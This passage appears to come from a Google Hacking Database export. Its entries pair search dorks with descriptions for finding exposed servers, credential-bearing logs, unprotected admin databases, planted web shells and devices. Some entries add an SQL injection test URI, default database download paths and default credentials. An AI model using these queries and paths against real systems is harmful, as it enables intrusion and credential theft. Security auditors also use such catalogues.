[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][814]] [[start][815] [[title]intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)[[title]] [[descr]The Apache::Status returns information about the server software, operating system, number of child processes and current visitors. The official documentation can be found at hxxp://search.cpan.org/~gozer/mod_perl-1.29/lib/Apache/Status.pm[descr]] [[url]http://www.google.com/search?q=intitle:%22Apache::Status%22+(inurl:server-status+%7C+inurl:status.html+%7C+inurl:apache.html)&num=100[url]] [[dork]intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)[dork]] [end][815]] [[start][818] [[title]"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log[[title]] [[descr]This file spills a lot of juicy info... in some cases, passwords in the raw dump, but not in any I've found this time around. However, with a computer name, a user name, and various other nuggets of info, this one file seems to sketch the system pretty well.[descr]] [[url]http://www.google.com/search?q=%22Microsoft+%28R%29+Windows+*+%28TM%29+Version+*+DrWtsn32+Copyright+%28C%29%22+ext%3Alog[url]] [[dork]"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log[dork]] [end][818]] [[start][819] [[title]"Powered by PowerPortal v1.3"[title]] [[descr]PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query.

PowerPortal 1.3 is reported prone to this vulnerability, however, it is possible that other versions are affected as well. An example URI sufficient to exploit this vulnerability has been provided: http://www.example.com/pp13/index.php?index_page=and 1=1

http://www.securityfocus.com/bid/11681[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=%22Powered+by+PowerPortal+v1.3%22[url]] [[dork]"Powered by PowerPortal v1.3"[dork]] [end][819]] [[start][820] [[title]inurl:report "EVEREST Home Edition "[title]] [[descr]Well what can be said about this one, I've added it to the DB under Juicy info, however it could have easily gone under virtually any of the lists as it just gives out Soooo much info.

I can for instance find out the admin username (not just the admin, every user) and also if it is password protected and if the password ever expires, plus is it a current user account; also do the same for any guest accounts. OK, nice and easy, how about the O/S and all the Mapped Drive locations? All there, along with installed software and even currently running applications and processes. Site admins would have to be mad to leave this stuff open, but as we all know from the GHDB Site admins do weird and funny stuff.
This one just gives out too much to list, so go have a look and see what you can find.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][820]] [[start][821] [[title]"powered by minibb" -site:www.minibb.net -intext:1.7f[[title]] [[descr]miniBB is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query.

miniBB versions prior to 1.7f are reported prone to this issue.

http://www.securityfocus.com/bid/11688[descr]] [[url]http://www.google.com/search?sourceid=navclient&ie=UTF-8&q=%22powered+by+minibb%22+%2Dsite%3Awww%2Eminibb%2Enet+%2Dintext%3A1%2E7f[url]] [[dork]"powered by minibb" -site:www.minibb.net -intext:1.7f[dork]] [end][821]] [[start][824] [[title]"Powered by Dudirectory" -site:duware.com[[title]] [[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.

For DuDirectory it's: /dudirectory/_private/dudirectory.mdb[descr]] [[url]http://www.google.com/search?num=100&&q=%22Powered+by+Dudirectory%22+-site%3Aduware.com[url]] [[dork]"Powered by Dudirectory" -site:duware.com[dork]] [end][824]] [[start][825] [[title]"powered by ducalendar" -site:duware.com[[title]] [[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.

For Ducalendar it's: /ducalendar/_private/ducalendar.mdb[descr]] [[url]http://www.google.com/search?num=100&q=%22powered+by+ducalendar%22+-site%3Aduware.com[url]] [[dork]"powered by ducalendar" -site:duware.com[dork]] [end][825]] [[start][826] [[title]"Powered by Duclassified" -site:duware.com[[title]] [[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.

For Duclassified it's: /duclassified/_private/duclassified.mdb[descr]] [[url]http://www.google.com/search?num=100&q=%22Powered+by+Duclassified%22+-site%3Aduware.com[url]] [[dork]"Powered by Duclassified" -site:duware.com[dork]] [end][826]] [[start][827] [[title]"Powered by Duclassified" -site:duware.com "DUware All Rights reserved"[title]] [[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.

For Duclassified it's: /duclassified/_private/duclassified.mdb[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22Powered+by+Duclassified%22+-site%3Aduware.com+%22DUware+All+Rights+Reserved%22&btnG=Search[url]] [[dork]"Powered by Duclassified" -site:duware.com "DUware All Rights Reserved"[dork]] [end][827]] [[start][828] [[title]"powered by duclassmate" -site:duware.com[[title]] [[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.

For Duclassmate it's: /duclassmate/_private/duclassmate.mdb[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%22powered+by+duclassmate%22+-site%3Aduware.com[url]] [[dork]"powered by duclassmate" -site:duware.com[dork]] [end][828]] [[start][829] [[title]intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com[[title]] [[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.

For Dupics rename location to ../_private/dupics.mdb [descr]] [[url]http://www.google.com/search?num=100&q=intitle%3Adupics+inurl%3A%28add.asp+%7C+default.asp+%7C+view.asp+%7C+voting.asp%29+-site%3Aduware.com[url]] [[dork]intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com[dork]] [end][829]] [[start][830] [[title]"powered by dudownload" -site:duware.com[[title]] [[descr]Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL.

rename ../xxx to ../_private/dudownload.mdb [descr]] [[url]http://www.google.com/search?num=100&q=%22powered+by+dudownload%22+-site%3Aduware.com[url]] [[dork]"powered by dudownload" -site:duware.com[dork]] [end][830]] [[start][831] [[title]intitle:"ipcop - main"[title]] [[descr]IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google Hackers ;)[descr]] [[url]http://www.google.com/search?q=intitle:%22ipcop+-+main%22&filter=0[url]] [[dork]intitle:"ipcop - main"[dork]] [end][831]] [[start][832] [[title]intitle:"Smoothwall Express" inurl:cgi-bin "up * days"[title]] [[descr]Smoothwall is a firewall operating system distribution based on Linux. (Not many results for this search at the moment). [descr]] [[url]http://www.google.com/search?q=intitle%3A%22Smoothwall+Express%22+inurl%3Acgi-bin+%22up+*+days%22[url]] [[dork]intitle:"Smoothwall Express" inurl:cgi-bin "up * days"[dork]] [end][832]] [[start][833] [[title]filetype:php HAXPLORER "Server Files Browser"[title]] [[descr]Haxplorer is a web-based file manager which enables the user to browse files on the webserver. You can rename, delete, copy, download and upload files.
As the script's name says, it is mostly installed by hackers.
[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=filetype%3Aphp+HAXPLORER+%22Server+Files+Browser%22&btnG=Search[url]] [[dork]filetype:php HAXPLORER "Server Files Browser"[dork]] [end][833]] [[start][834] [[title]inurl:coranto.cgi intitle:Login (Authorized Users Only)[[title]] [[descr]Coranto is one of the most powerful Content Management Systems (CMS) available on the market. It is a freeware product written in Perl and it can help the development and streamlining of your site(s). It is written to be a multiuser environment for posting news articles on a web site; it supports multiple browsers, multiple operating systems, produces standards-compliant HTML, has a huge variety of excellent features and is fully extendible via addons. It is free for use on any site, personal or commercial![descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Acoranto.cgi+intitle%3ALogin+%28Authorized+Users+Only%29[url]] [[dork]inurl:coranto.cgi intitle:Login (Authorized Users Only)[dork]] [end][834]] [[start][835] [[title] filetype:log intext:"ConnectionManager2"[title]] [[descr]ISDNPM 3.x for OS/2-Dialer log files.
These files contain sensitive info like IP addresses, phone numbers of dial-in servers, usernames and password hashes - Everything you need to dial in....[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][835]] [[start][836] [[title]intext:"Videoconference Management System" ext:htm[[title]] [[descr]Tandberg video conferencing appliances
The web interface enables you to drop calls and to browse the internal phonebook

[descr]] [[url]http://www.google.com/search?q=intext:%22Videoconference+Management+System%22+ext:htm&hl=en&lr=&c2coff=1&start=0&sa=N[url]] [[dork]intext:"Videoconference Management System" ext:htm[dork]] [end][836]] [[start][837] [[title]ext:txt "Final encryption key"[title]] [[descr]IPSec debug/log data which contains user data and password hashes.
Can be used to crack passwords.[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=ext%3Atxt+%22Final+encryption+key%22+&btnG=Search[url]] [[dork]ext:txt "Final encryption key" [dork]] [end][837]] [[start][838] [[title]ext:log "Final encryption key"[title]] [[descr]IPSec debug/log data which contains user data and password hashes.
Can be used to crack passwords[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][838]] [[start][839] [[title]filetype:log "See `ipsec --copyright"[title]] [[descr]BARF log files
Man page:
Barf outputs (on standard output) a collection of debugging information (contents of files, selections from logs, etc.) related to the IPSEC encryption/authentication system. It is primarily a convenience for remote debugging, a single command which packages up (and labels) all information that might be relevant to diagnosing a problem in IPSEC.[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][839]] [[start][840] [[title]intitle:"Welcome To Xitami" -site:xitami.com[[title]] [[descr]Default Xitami installation

Additionally every default installation of Xitami webserver has a test script which provides a lot of information about the server.
It can be run by entering the following URL

http://server/cgialias/testcgi.exe
(cgialias is usually /cgi-bin/)[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22Welcome+To+Xitami%22+-site%3Axitami.com&btnG=Google+Search[url]] [[dork]intitle:"Welcome To Xitami" -site:xitami.com[dork]] [end][840]] [[start][841] [[title]inurl:testcgi xitami[[title]] [[descr]Test page / webserver environment
This is the test cgi for xitami webserver. It shows the webserver's complete environment. Contains very interesting information which can be used as a first step into the server.[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Atestcgi+xitami&btnG=Search[url]] [[dork]inurl:testcgi xitami[dork]] [end][841]] [[start][842] [[title] intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu[[title]] [[descr]Some companies use a Xerox Product called DocuShare. The problem with this is by default guest access is enabled and it appears a lot of companies either don't care or don't know.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22DocuShare%22+inurl%3A%22docushare%2Fdsweb%2F%22+-faq+-gov+-edu[url]] [[dork]intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu[dork]] [end][842]] [[start][843] [[title]intext:"Powered By: TotalIndex" intitle:"TotalIndex"[title]] [[descr]TotalIndex v2.0 is an open source script that is designed to replace the simple, and boring default index page of a site which lists the files in an indexed folder. It's not PW protected so an attacker can browse the files and take what they want.[descr]] [[url]http://www.google.com/search?hl=en&q=intext%3A%22Powered+By%3A+TotalIndex%22+intitle%3A%22TotalIndex%22[url]] [[dork]intext:"Powered By: TotalIndex" intitle:"TotalIndex"[dork]] [end][843]] [[start][844] [[title]inurl:"GRC.DAT" intext:"password"[title]] [[descr]Symantec Norton Anti-Virus Corporate Edition data file containing encrypted passwords.[descr]] [[url]http://www.google.com/search?q=inurl%3A%22GRC.DAT%22+intext%3A%22password%22[url]] [[dork]inurl:"GRC.DAT" intext:"password"[dork]] [end][844]] [[start][845] [[title]inurl:php.exe filetype:exe -example.com[[title]] [[descr]It is possible to read any file remotely on the server with PHP.EXE (assuming a script alias for it is enabled), even across drives. 
(Note: The GHDB has another search for this file based on directory listings, try them both)[descr]] [[url]http://www.google.com/search?q=inurl%3Aphp.exe+filetype%3Aexe+-example.com[url]] [[dork]inurl:php.exe filetype:exe -example.com[dork]] [end][845]] [[start][846] [[title]intitle:"PHP Advanced Transfer" inurl:"login.php"[title]] [[descr]PHP Advanced Transfer is GPL'd software that claims to be "The ultimate PHP download & upload manager". This is a search for the login pages.[descr]] [[url]http://www.google.com/search?num=50&q=intitle%3A%22PHP+Advanced+Transfer%22+inurl%3A%22login.php%22[url]] [[dork]intitle:"PHP Advanced Transfer" inurl:"login.php"[dork]] [end][846]] [[start][847] [[title]intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )[[title]] [[descr]PHP Advanced Transfer is GPL'd software that claims to be "The ultimate PHP download & upload manager". This is a search for the main and recently changed files pages.[descr]] [[url]http://www.google.com/search?num=100&q=intitle%3A%22PHP+Advanced+Transfer%22+%28inurl%3Aindex.php+%7C+inurl%3Ashowrecent.php+%29[url]] [[dork]intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )[dork]] [end][847]] [[start][848] [[title]"Output produced by SysWatch *"[title]] [[descr]SysWatch is a CGI to display current information about your UNIX system. It can display drive partitions, disk or drive usage, as well as resource hogs (running processes) and last but not least it shows what current users are doing online (including sh scripts etc..). [descr]] [[url]http://www.google.com/search?num=200&q=%22Output+produced+by+SysWatch+*%22[url]] [[dork]"Output produced by SysWatch *"[dork]] [end][848]] [[start][849] [[title]PHPKonsole PHPShell filetype:php -echo[[title]] [[descr]PHPKonsole is just a little telnet-like shell which allows you to run commands on the webserver. When you run commands they will run as the webserver's UserID. 
This should work perfectly for managing files, like moving, copying etc. If you're using a linux server, system commands such as ls, mv and cp will be available for you...
[descr]] [[url]http://www.google.com/search?q=PHPKonsole+PHPShell++filetype%3Aphp+-echo[url]] [[dork]PHPKonsole PHPShell filetype:php -echo[dork]] [end][849]] [[start][850] [[title]"Phorum Admin" "Database Connection" inurl:forum inurl:admin[[title]] [[descr]Phorum admin pages
This either shows Information leakage (path info) or it shows Unprotected Admin pages.[descr]] [[url]http://www.google.com/search?num=20&q=%22Phorum+Admin%22+%22Database+Connection%22+inurl%3Aforum+inurl%3Aadmin[url]] [[dork]"Phorum Admin" "Database Connection" inurl:forum inurl:admin[dork]] [end][850]] [[start][851] [[title]"Warning: mysql_query()" "invalid query"[title]] [[descr]MySQL query errors revealing database schema and usernames.
[descr]] [[url]http://www.google.com/search?hl=en&c2coff=1&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=%22Warning%3A+mysql_query%28%29%22+%22invalid+query%22&btnG=Search[url]] [[dork]"Warning: mysql_query()" "invalid query"[dork]] [end][851]] [[start][852] [[title]inurl:"/cgi-bin/loadpage.cgi?user_id="[title]] [[descr]Description:
EZshopper is a full-featured shopping cart program.

loadpage.cgi of EZshopper allows Directory Traversal

http://www.securityfocus.com/bid/2109

[descr]] [[url]http://www.google.com/search?hl=en&ie=ISO-8859-1&q=inurl%3A%22%2Fcgi-bin%2Floadpage.cgi%3Fuser_id%3D%22&btnG=Google-Suche&meta=[url]] [[dork]inurl:"/cgi-bin/loadpage.cgi?user_id="[dork]] [end][852]] [[start][853] [[title]inurl:"ipp/pdisplay.htm"[title]] [[descr]Providing a standout printing solution, Novell iPrint offers secure print services that extend across multiple networks and operating systems—bringing the power of the Net to your business environment. This search locates various online printers.[descr]] [[url]http://www.google.com/search?q=inurl%3A%22ipp%2Fpdisplay.htm%22[url]] [[dork]inurl:"ipp/pdisplay.htm"[dork]] [end][853]] [[start][854] [[title]filetype:mdb inurl:"news/news"[title]] [[descr]Web Wiz Site News unprotected database holds config and admin information in a Microsoft Access database in news/news.mdb. This information is almost always unprotected. [descr]] [[url]http://www.google.com/search?q=filetype:mdb+inurl:%22news/news%22[url]] [[dork]filetype:mdb inurl:"news/news"[dork]] [end][854]] [[start][855] [[title]intitle:"View Img" inurl:viewimg.php[[title]] [[descr]It is reported that the 'viewing.php' script does not properly validate user-supplied input in the 'path' variable. A remote user can submit a specially crafted URL to view a list of files within an arbitrary directory. See http://securitytracker.com/alerts/2004/Nov/1012312.html for more information.
[descr]] [[url]http://www.google.com/search?q=intitle:%22View+Img%22+inurl:viewimg.php[url]] [[dork]intitle:"View Img" inurl:viewimg.php[dork]] [end][855]] [[start][856] [[title]intitle:"Resin Default Home Page"[title]] [[descr]Resin provides a fast standalone web server. This search locates those servers based on the title of the default page.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22Resin+Default+Home+Page%22[url]] [[dork]intitle:"Resin Default Home Page"[dork]] [end][856]] [[start][857] [[title]intext:"Storage Management Server for" intitle:"Server Administration"[title]] [[descr]These pages can reveal information about the operating system and patch level, as well as providing a login portal for hackers to attack. "As part of the IBM TotalStorage® Open Software Family, IBM Tivoli Storage (ADSM) Manager protects your organization's data from hardware failures and other errors by storing backup and archive copies of data on offline storage." [descr]] [[url]http://www.google.com/search?q=intext:%22Storage+Management+Server+for%22+intitle:%22Server+Administration%22[url]] [[dork]intext:"Storage Management Server for" intitle:"Server Administration"[dork]] [end][857]] [[start][858] [[title] filetype:pl -intext:"/usr/bin/perl" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)[[title]] [[descr]WebCal allows you to create and maintain an interactive events calendar or scheduling system on your Web site. 
The file names explain themselves, but don't abuse the faulty admins.[descr]] [[url]http://www.google.com/search?num=100&q=filetype%3Apl+-intext%3A%22%2Fusr%2Fbin%2Fperl%22+inurl%3Awebcal+%28inurl%3Awebcal+%7C+inurl%3Aadd+%7C+inurl%3Adelete+%7C+inurl%3Aconfig%29[url]] [[dork]filetype:pl -intext:"/usr/bin/perl" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)[dork]] [end][858]] [[start][859] [[title]site:ups.com intitle:"Ups Package tracking" intext:"1Z ### ### ## #### ### #"[title]] [[descr]Ever use the UPS Automated Tracking Service?? Wanna see where packages are going? Want to Man-in-the-middle their delivery? Well, then here it is.

-Digital Spirit[descr]] [[url]http://www.google.com/search?hl=en&lr=&safe=off&q=site%3Aups.com+intitle%3A%22Ups+Package+tracking%22+intext%3A%221Z+%23%23%23+%23%23%23+%23%23+%23%23%23%23+%23%23%23+%23%22&btnG=Search[url]] [[dork]site:ups.com intitle:"Ups Package tracking" intext:"1Z ### ### ## #### ### #"[dork]] [end][859]] [[start][860] [[title]intitle:"twiki" inurl:"TWikiUsers"[title]] [[descr]TWiki has many security problems, depending on the version installed. TWiki is a flexible, powerful, and easy to use enterprise collaboration platform. It is a structured Wiki, typically used to run a project development space, a document management system, a knowledge base, or any other groupware tool, on an intranet or on the internet. Web content can be created collaboratively by using just a browser. Developers can create new web applications based on a Plugin API.

[descr]] [[url]http://www.google.com/search?q=intitle%3A%22twiki%22+inurl%3A%22TWikiUsers%22[url]] [[dork]intitle:"twiki" inurl:"TWikiUsers"[dork]] [end][860]] [[start][861] [[title]+"Powered by Invision Power Board v2.0.0..2"[title]] [[descr]A remote SQL injection vulnerability affects Invision Power Board. This issue is due to a failure of the application to properly validate user-supplied input prior to using it in an SQL query.

http://www.securityfocus.com/bid/11719[descr]] [[url]http://www.google.com/search?num=100&q=%2B%22Powered+by+Invision+Power+Board+v2.0.0..2%22[url]] [[dork]+"Powered by Invision Power Board v2.0.0..2"[dork]] [end][861]] [[start][862] [[title]ext:gho gho[[title]] [[descr]Norton Ghost allows administrators to create hard drive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything![descr]] [[url]http://www.google.com/search?q=ext%3Agho+gho[url]] [[dork]ext:gho gho[dork]] [end][862]] [[start][863] [[title]ext:pqi pqi -database[[title]] [[descr]PQ DriveImage allows administrators to create hard drive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything![descr]] [[url]http://www.google.com/search?q=ext%3Apqi+pqi+-database[url]] [[dork]ext:pqi pqi -database[dork]] [end][863]] [[start][864] [[title]ext:vmdk vmdk[[title]] [[descr]VMWare allows PC emulation across a variety of platforms. These files are VMWare disk images which essentially contain a copy of an entire PC, which could contain almost anything.[descr]] [[url]http://www.google.com/search?q=ext:vmdk+vmdk&num=100&filter=0[url]] [[dork]ext:vmdk vmdk[dork]] [end][864]] [[start][865] [[title]ext:vmx vmx[[title]] [[descr]VMWare allows PC emulation across a variety of platforms. These configuration files describe a virtual PC, and reveal information about that PC's hardware settings.[descr]] [[url]http://www.google.com/search?q=ext:vmx+vmx&num=100&filter=0[url]] [[dork]ext:vmx vmx[dork]] [end][865]] [[start][866] [[title]inurl:filezilla.xml -cvs[[title]] [[descr]filezilla.xml contains Sites, Logins and crypted Passwords of ftp connections made with the open source program filezilla. 
[descr]] [[url]http://www.google.com/search?hl=en&lr=&c2coff=1&q=inurl%3Afilezilla.xml+-cvs[url]] [[dork]inurl:filezilla.xml -cvs[dork]] [end][866]] [[start][869] [[title]+"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl[[title]] [[descr]phpbb is vulnerable to SQL Injection, allowing people to manipulate the query into pulling data (such as passwords). Arbitrary EXEC allows an attacker (if they get on to a new line), to execute their own PHP, which can be fatal.
[descr]] [[url]http://www.google.com/search?num=100&q=+%2B%22Powered+by+phpBB+2.0.6..10%22+-phpbb.com+-phpbb.pl[url]] [[dork] +"Powered by phpBB 2.0.6..10" -phpbb.com -phpbb.pl[dork]] [end][869]] [[start][870] [[title]"Copyright (c) Tektronix, Inc." "printer status"[title]] [[descr]Captain, the Phasers are online :)
[descr]] [[url]http://www.google.com/search?num=100&q=%22Copyright+%28c%29+Tektronix%2C+Inc.%22+%22printer+status%22[url]] [[dork]"Copyright (c) Tektronix, Inc." "printer status"[dork]] [end][870]] [[start][871] [[title]intext:"MaiLinX Alert (Notify)" -site:networkprinters.com[[title]] [[descr]Xerox DocuPrint printer models.[descr]] [[url]http://www.google.com/search?num=100&q=intext%3A%22MaiLinX+Alert+%28Notify%29%22+-site%3Anetworkprinters.com[url]] [[dork]intext:"MaiLinX Alert (Notify)" -site:networkprinters.com[dork]] [end][871]] [[start][872] [[title]inurl:"printer/main.html" intext:"settings"[title]] [[descr]Brother HL Printers.[descr]] [[url]http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&safe=off&c2coff=1&q=inurl%3A%22printer%2Fmain.html%22+intext%3A%22settings%22&btnG=Search[url]] [[dork]inurl:"printer/main.html" intext:"settings"[dork]] [end][872]] [[start][873] [[title]inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo[[title]] [[descr]Mercury SiteScope designed to ensure the availability and performance of distributed IT infrastructures — e.g., servers, operating systems, network devices, network services, applications, and components. Some pages may be IP restricted.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%22sitescope.html%22+intitle%3A%22sitescope%22+intext%3A%22refresh%22+-demo&btnG=Google+Search[url]] [[dork]inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo[dork]] [end][873]] [[start][874] [[title]axis storpoint "file view" inurl:/volumes/[[title]] [[descr]The Axis Storpoint device turns a SCSI or ATA box with lots of cdrom players (or writers) into a cd tower which can be browsed through any browser. The default admin password combo = root/pass. CD access can be password restricted like in Apache. Axis uses it's own server software. 
Many vulnerabilities can be found in the security databases like SF.[descr]] [[url]http://www.google.com/search?q=axis+storpoint+%22file+view%22+inurl%3A%2Fvolumes%2F[url]] [[dork]axis storpoint "file view" inurl:/volumes/[dork]] [end][874]] [[start][875] [[title]inurl:"/axs/ax-admin.pl" -script[[title]] [[descr]This system records visits to your site. This admin script allows you to display these records in meaningful graph and database formats.[descr]] [[url]http://www.google.com/search?hl=en&q=inurl%3A%22%2Faxs%2Fax-admin.pl%22+-script[url]] [[dork]inurl:"/axs/ax-admin.pl" -script[dork]] [end][875]] [[start][876] [[title]"Generated by phpSystem"[title]] [[descr]PhpSystem shows info about unix systems, including: General Info (kernel, cpu, uptime), Connections, Who Is Logged In, Memory, Swap and active mounts.[descr]] [[url]http://www.google.com/search?hl=en&q=%22Generated+by+phpSystem%22[url]] [[dork]"Generated by phpSystem"[dork]] [end][876]] [[start][877] [[title]php-addressbook "This is the addressbook for *" -warning[[title]] [[descr]php-addressbook shows user address information without a password.[descr]] [[url]http://www.google.com/search?q=php-addressbook++%22This+is+the+addressbook+for+*%22+-warning[url]] [[dork]php-addressbook "This is the addressbook for *" -warning[dork]] [end][877]] [[start][878] [[title][[title]] [[descr][descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][878]] [[start][879] [[title]intitle:"Multimon UPS status page"[title]] [[descr]Multimon provide UPS monitoring services
[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][879]] [[start][880] [[title]intitle:"Mail Server CMailServer Webmail" "5.2"[title]] [[descr]CMailServer is a small mail server with a webmail interface. Multiple vulnerabilities were found in it, including a buffer overflow, SQL injection and XSS.

http://www.securiteam.com/windowsntfocus/6E00M2KBPS.html[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22Mail+Server+CMailServer+Webmail%22+%225.2%22[url]] [[dork]intitle:"Mail Server CMailServer Webmail" "5.2"[dork]] [end][880]] [[start][881] [[title]intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org[[title]] [[descr]This search uses desktop.ini to find users with a web server running on their desktop computers. It can easily be extended to find specific documents.[descr]] [[url]http://www.google.com/search?hl=en&q=intitle%3A%22index+of%22+%22parent+directory%22+%22desktop.ini%22+site%3Adyndns.org&btnG=Google+Search[url]] [[dork]intitle:"index of" "parent directory" "desktop.ini" site:dyndns.org[dork]] [end][881]] [[start][882] [[title]intitle:"Live NetSnap Cam-Server feed"[title]] [[descr]NetSnap online cameras.[descr]] [[url]http://www.google.com/search?q=intitle:%22Live+NetSnap+Cam-Server+feed%22[url]] [[dork]intitle:"Live NetSnap Cam-Server feed"[dork]] [end][882]] [[start][883] [[title]intitle:"V-Gear BEE"[title]] [[descr]V-Gear Bee web cameras.[descr]] [[url]http://www.google.com/search?q=intitle%3A%22V-Gear+BEE%22[url]] [[dork]intitle:"V-Gear BEE"[dork]] [end][883]] [[start][884] [[title]intitle:"AudioReQuest.web.server"[title]] [[descr]Audio ReQuest home CD/MP3 player. Various information about the configuration of the host and surrounding network can be found out by visiting the main page of this server. Beyond that, you could peruse someone's MP3 collection![descr]] [[url]http://www.google.com/search?q=intitle%3A%22AudioReQuest.web.server%22[url]] [[dork]intitle:"AudioReQuest.web.server"[dork]] [end][884]] [[start][885] [[title]filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"[title]] [[descr]DShield is a distributed intrusion detection system. 
The ipinfo.php script includes a whois lookup form.[descr]] [[url]http://www.google.com/search?q=filetype%3Aphp+inurl%3Aipinfo.php+%22Distributed+Intrusion+Detection+System%22[url]] [[dork]filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"[dork]] [end][885]] [[start][886] [[title]ext:cfg radius.cfg[[title]] [[descr]"Radiator is a highly configurable and flexible Radius server that supports authentication by nearly 60 different types of authentication methods"

This search finds configuration files for this server, revealing its behaviour, methods for authenticating users, etc.[descr]] [[url]http://www.google.com/search?q=ext:cfg+radius.cfg&hl=en&lr=&filter=0[url]] [[dork]ext:cfg radius.cfg[dork]] [end][886]] [[start][889] [[title]intitle:"VitalQIP IP Management System"[title]] [[descr]The VitalQIP Web Client Interface provides a World Wide Web interface for the VitalQIP IP Management software. The purpose of the VitalQIP Web Client Interface is to allow users to add, modify, and delete IP addresses; create configuration and data files; and generate reports. It is not a fully functional user interface, such as the VitalQIP Windows or VitalQIP UNIX Clients. Certain options, such as infrastructure or policy management, are not provided. The VitalQIP Web Client Interface software is based on HTML and Perl, so your organization can customize it to meet your requirements.

Vendor's site: http://www.lucent.com/products/solution/0,,CTID+2020-STID+10438-SOID+1456-LOCL+1,00.html

[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][889]] [[start][891] [[title]inurl:"/stCenter.nsf/" -demo[[title]] [[descr]With Sametime products you can collaborate with your colleagues in real time. You can schedule meetings. You can administer your Sametime product through a web interface. (You can see who is online and send quick messages to answer specific questions. You can work with team members in remote locations by sharing and jointly editing data during online meetings.)

http://www-306.ibm.com/software/lotus/sw-atoz/indexS.html[descr]] [[url]http://www.google.com/[url]] [[dork][dork]] [end][891]] [[start][892] [[title]intitle:"start.managing.the.device" remote pbx acc[[title]] [[descr]MCK Communications, Inc.
PBXgatewayII

High density central site gateway for remote PBX access

(MCK Communications is now known as VESO.)[descr]] [[url]http://www.google.com/search?q=intitle%3A%22start.managing.the.device%22+remote+pbx+access+&sourceid[url]] [[dork]intitle:"start.managing.the.device" remote pbx access [dork]] [end][892]] [[start][893] [[title]intext:"powered by Web Wiz Journal"[title]] [[descr]Web Wiz Journal ASP Blog.
The MDB database is usually unprotected and can be downloaded directly. The DB contains the administrative accounts.

filename: journal.mdb
admin login: admin.html
